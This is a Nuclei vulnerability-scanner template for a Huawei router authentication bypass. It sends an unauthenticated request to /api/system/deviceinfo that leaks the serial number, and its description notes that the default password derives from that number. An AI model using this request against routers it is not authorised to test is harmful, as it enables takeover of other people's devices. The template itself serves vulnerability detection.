nuclei-templates/vulnerabilities/other/huawei-router-auth-bypass.yaml

31 lines
786 B
YAML
Raw Normal View History

id: huawei-router-auth-bypass
info:
name: Huawei Router Authentication Bypass
author: gy741
severity: critical
description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device.
reference:
- https://www.exploit-db.com/exploits/48310
2021-07-06 18:02:45 +00:00
tags: huawei,auth-bypass,router
requests:
- raw:
- |
GET /api/system/deviceinfo HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Referer: {{BaseURL}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "DeviceName"
- "SerialNumber"
2021-07-06 18:02:45 +00:00
- "HardwareVersion"
condition: and